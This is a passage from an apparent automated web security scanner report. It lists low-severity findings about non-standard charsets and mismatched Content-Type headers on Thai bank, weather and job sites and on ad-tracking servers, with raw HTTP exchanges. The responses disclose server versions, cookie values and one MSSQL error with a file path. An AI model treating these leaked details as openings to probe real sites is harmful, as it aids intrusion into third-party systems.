<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<meta name="keywords" content="Thailand Web Directory, Website Statistics , truehits.net, Ranking, ......, ....., ..........., ..., .........." />
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<link href="/css/u6isap.css" rel="stylesheet" type="text/css" />
...[SNIP]...

30.2. http://www.nationejobs.com/fulltime/displayposition_thai.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.nationejobs.com
Path:   /fulltime/displayposition_thai.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /fulltime/displayposition_thai.php HTTP/1.1
Host: www.nationejobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 04 Sep 2011 04:54:47 GMT
Connection: close
Content-type: text/html
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3292

<br />
<b>Warning</b>: mssql_query(): message: Incorrect syntax near the keyword 'Where'. (severity 15) in <b>D:\Website\www.nationejobs.com\fulltime\inc_displayposition.php</b> on line <b>111</b><br
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<META NAME="description" CONTENT=""/>
...[SNIP]...

30.3. http://www.scb.co.th/scb_api/api_a_deposit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.scb.co.th
Path:   /scb_api/api_a_deposit.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /scb_api/api_a_deposit.jsp HTTP/1.1
Host: www.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=8BD3C448717B8502EA3F369D6A6593E1; Path=/scb_api
Connection: close
Content-Type: text/html;charset=tis-620
Content-Length: 8225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.or
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...

30.4. http://www.scb.co.th/scb_api/scbapi.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /scb_api/scbapi.jsp?key=MjAxMTAxMTgxNzQ4MTA= HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:13 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=tis-620
Content-Length: 10672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<title>
...[SNIP]...

30.5. http://www.tmd.go.th/en/daily_forecast_forweb.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmd.go.th
Path:   /en/daily_forecast_forweb.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/daily_forecast_forweb.php?strProvinceID=37-2-75-61-35-18-72-1-27-39-55-62-64 HTTP/1.1
Host: www.tmd.go.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=tis-620
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:25:14 GMT
Content-Length: 10189

<LINK rel="stylesheet" type="text/css" href="stylesheets\tmdstyle.css">


<TABLE width='100%' cellpadding='0' cellspacing='0' align='center'1 border='0'><TR><TD colspan=5 align='center' bgcolor='#4
...[SNIP]...

30.6. http://www.tmd.go.th/en/province.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.tmd.go.th
Path:   /en/province.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/province.php HTTP/1.1
Host: www.tmd.go.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=tis-620
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:45:20 GMT
Connection: close
Content-Length: 26227


<HTML>
<HEAD>
<TITLE>Thai Meteorological Department - Bangkok Weather</TITLE>
<meta name="description" content="Bangkok, Bangkok Forecast Weather, BANGKOK METROPOLIS">
<META NAME="keywords"
...[SNIP]...

31. Content type incorrectly stated  previous  next
There are 56 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


31.1. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 04:06:28 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

31.2. http://ads.indiatimes.com/ads.dll/genptypead  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.indiatimes.com
Path:   /ads.dll/genptypead

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ads.dll/genptypead HTTP/1.1
Host: ads.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: GeoDetail=254%2C915%2C58141; path=/; expires=Mon, 05 Sep 2011 09:38:16 GMT
Expires: Mon, 08 Dec 2008 04:08:16 GMT
Content-Type: text/html
Content-Length: 342

var h=self.screen.height-self.screen.availHeight;var t=self.screen.availHeight-0;t=t-h;var str="titlebar=no,toolbar=no,scrollbars=no,status=no,resizable=no,controls=no,topmargin=0,leftmargin=0,left=0,
...[SNIP]...

31.3. http://ads3.bangkokpost.co.th/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads3.bangkokpost.co.th
Path:   /www/delivery/spc.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /www/delivery/spc.php?zones=120%3D120%7C127%3D127%7C170%3D170%7C&nz=1&source=&r=29318038&charset=UTF-8&loc=http%3A//www.bangkokpost.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news HTTP/1.1
Host: ads3.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:04 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 72
Vary: User-Agent,Accept-Encoding
Content-Length: 72
Content-Type: application/x-javascript; charset=UTF-8

OA_output['120'] = '';

OA_output['127'] = '';

OA_output['170'] = '';


31.4. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446938/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446938/0/0/ADTECH

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /adrawdata/3.0/5108.1/1446938/0/0/ADTECH;kvinvtype=display;kvrid=1323243821bd3a2334d85d82f0661701;kvexpandable=1;kvdim=twig;kvbw=0;kvpid=1446938;kvgm=100;kva2534=100;kva2544=100;kva1834=100;kvagt18=100;kvagt25=100;kvagt35=100 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 14662

<!-- 00.00000 -->
<adFrames version="2.1" type="adFramesV2" ccid="1827986-1" rev="12033:12037MP" path="invtype=display;rid=1323243821bd3a2334d85d82f0661701;expandable=1;dim=twig;bw=0;pid=1446938;gm=1
...[SNIP]...

31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446945/0/0/ADTECH

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adrawdata/3.0/5108.1/1446945/0/0/ADTECH;kvinvtype=doc;kvexpandable=1;kvdim=fixed_bottom;kvpid=1446945;kvbw=0;kvthrottle=0;misc=1315103282990;kvrid=13232437d63581d89690132a84a8536a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/bb/pc/vepc.swf?0.7609747000969946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 100

var ve_am = { "housead": "true", "adid" : "1242772-1", "ccid": "1242772-1", "reason": "DELIVERY" };

31.6. http://api.tweetmeme.com/ajax/partial  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.tweetmeme.com
Path:   /ajax/partial

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /ajax/partial HTTP/1.1
Host: api.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:12:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 8.5830688476562E-5
X-Served-In: 0.0010409355163574
X-Served-By: h00
Content-Length: 53

{"response":"failure","data":"Please specify a body"}

31.7. http://api.tweetmeme.com/v2/follow.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /v2/follow.js HTTP/1.1
Host: api.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:12:18 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h03
Content-Length: 75

tweetmemedata({"status":"failure","reason":"missing param 'screen_name'"});

31.8. http://beacon.videoegg.com/abandoned  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /abandoned

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /abandoned?rid=13232437d63581d89690132a84a8536a&prod=doc&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103658434&curtz=300&et=382047&ttos=0&state=dm HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:33:49 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s2";

31.9. http://beacon.videoegg.com/admodelreceived  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /admodelreceived

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /admodelreceived?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&dim=fixed_bottom&curtime=1315103283969&et=7582&pui=3afdefa4e88c481b3d934263a005db8f&atstat=no&fcid=1242772-1&art=888&prod=doc&adserv=adtech&tech=bb&reason=DELIVERY HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:11:31 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s8";

31.10. http://beacon.videoegg.com/adpo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /adpo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adpo?ab=at%2Cod&adserv=adtech&adtechperc=1&adtime=14274&ai=1&ar=0&area=INDIATIMES_US&bw=x&ccid=1977158-1&dim=twig&eapv=14533&expandable=1&fv=10.3.183&g=m&gi=0&loc=INDIATIMES_US_ROS_TWIG&pb=indiatimes&prod=adframes&pstat=exists&pui=3afdefa4e88c481b3d934263a005db8f&reason=null&ref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&stat=ad&tech=admanager&totime=17464&type=html&version=2&curtime=1315103298219&curtz=300&ord=8 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:23 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

31.11. http://beacon.videoegg.com/amcload  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /amcload

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /amcload?adserv=adtech&amctime=3186&area=INDIATIMES_US&fv=10.3.183&handler=invitation&loc=INDIATIMES_US_ROS_TWIG&os=WIN&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&tech=admanager&type=html&version=2&curtime=1315103283934&curtz=300&ord=4 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:09:04 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

31.12. http://beacon.videoegg.com/coreloaded  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /coreloaded

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /coreloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&dim=fixed_bottom&curtime=1315103282955&et=6568&os=Win&fv=10.3.183&tech=bb&x=0&y=0&btf=false&exp=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:24 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s3";

31.13. http://beacon.videoegg.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /demo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /demo?a=x&area=INDIATIMES_US&g=x&m=0&provider=bluekai&pui=3afdefa4e88c481b3d934263a005db8f&rawdata=%7B%22campaigns%22%3A%5B%5D%7D&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&t=14118&curtime=1315103298041&curtz=300&ord=7 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:40 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s8";

31.14. http://beacon.videoegg.com/domloaded  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /domloaded

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /domloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103283068&et=6681 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:39 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

31.15. http://beacon.videoegg.com/echo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /echo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /echo?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103283067&et=6680&burl=http%3A//adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH%3Bkvinvtype%3Ddoc%3Bkvexpandable%3D1%3Bkvdim%3Dfixed_bottom%3Bkvpid%3D1446945%3Bkvbw%3D0%3Bkvthrottle%3D0%3Bmisc%3D1315103282990%3Bkvrid%3D13232437d63581d89690132a84a8536a HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:35 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s1";

31.16. http://beacon.videoegg.com/init  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /init

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /init?rid=13232437d63581d89690132a84a8536a&prod=doc&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103276390&curtz=300&et=3&pb=indiatimes&si=TIMESOFINDIA_DOC_ROS&area=TIMESOFINDIA_DOC_ROS&dim=undefinedxundefined&ifrm=false&tech=bb&exp=1&pvid=13232437d657764a1b037f2aa42ffda9&loc=http%3A//timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:04:04 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

31.17. http://beacon.videoegg.com/initjs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /initjs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /initjs?pb=indiatimes&si=INDIATIMES_US&area=INDIATIMES_US&dim=twig&loc=INDIATIMES_US_ROS_TWIG&pl=x&rid=1323243821bd3a2334d85d82f0661701&pvid=13232437d657764a1b037f2aa42ffda9&tech=admanager&curtime=1315103277595&curtz=300&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:04:54 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s4";

31.18. http://beacon.videoegg.com/interact  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /interact

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /interact?adid=1977158-1&area=INDIATIMES_US&ccid=1977158-1&dim=twig&int=invite_impression&loc=INDIATIMES_US_ROS_TWIG&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&version=2&curtime=1315103301834&curtz=300&ord=10 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:20:10 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s1";

31.19. http://beacon.videoegg.com/invpos  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /invpos

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /invpos?rid=1323243821bd3a2334d85d82f0661701&winwidth=1233&winheight=1037&adtop=3930&adleft=0&curtime=1315103280158&curtz=300&ord=2 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
